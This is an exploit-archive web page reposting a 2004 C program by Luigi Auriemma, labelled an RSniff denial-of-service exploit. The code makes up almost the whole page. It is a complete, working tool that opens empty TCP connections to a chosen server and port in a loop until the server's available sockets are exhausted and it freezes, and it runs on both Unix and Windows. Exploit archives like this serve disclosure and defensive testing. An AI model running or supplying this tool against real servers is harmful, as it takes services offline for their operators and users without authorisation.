首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RSniff denial of service exploit
来源:http://aluigi.altervista.org 作者:Luigi 发布时间:2004-04-16  

RSniff denial of service exploit


/*

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define usleep sleep
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif


#define VER "0.1"
#define WAITMS 1


u_long resolv(char *host);
void std_err(void);


int main(int argc, char *argv[]) {
u_short port;
int sd,
i,
err,
waitms = WAITMS,
toutums;
struct sockaddr_in peer;
struct timeval tout;
fd_set fd_read;


setbuf(stdout, NULL);

fputs("\n"
"Empty-connections DoS "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 3) {
printf("\nUsage: %s <server> <port> [milliseconds(%d)]\n"
"\n"
"If you set milliseconds to 0, the tool will not do the check to know if the\n"
"server has finished the available sockets (freezed)\n"
"\n"
"Note: the check enabled in this tool runs fine only if the server doesn't send\n"
" data when the connection is made, as webservers for example. For other\n"
" types of servers use 0 milliseconds or modify the source code\n"
"\n", argv[0], WAITMS);
exit(1);
}

if(argc > 3) waitms = atoi(argv[3]);
toutums = waitms * 1000;

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#else
waitms *= 1000;
#endif

port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("\n"
"Connecting to %s:%hu\n\n",
inet_ntoa(peer.sin_addr), port);

i = 1;
while(1) {
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();

if(waitms) {
tout.tv_sec = 0;
tout.tv_usec = toutums;
FD_ZERO(&fd_read);
FD_SET(sd, &fd_read);
err = select(sd + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(err) break;
}

close(sd);
printf("%d\r", i++);
usleep(waitms);
}

fputs("\nServer should have finished the available sockets, it is freezed now\n", stdout);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}


#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·monit <= 4.1 remote root ex
·WinZip32 MIME Parsing Overflow
·WinSCP Denial of Service Explo
·Win Utility Manager Local SYST
·KPhone version 4.0.1 and prior
·Serv-U FTP服务器LIST命令超长-l
·LCDproc Server 0.4.4 and lower
·Multiple Cisco Exploit Codes
·IIS SSL Remote Denial of Servi
·SquirrelMail chpasswd local Ro
·NewsPHP Admin via Cookie Proof
·Microsoft IIS 5.0 SSL Remote E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved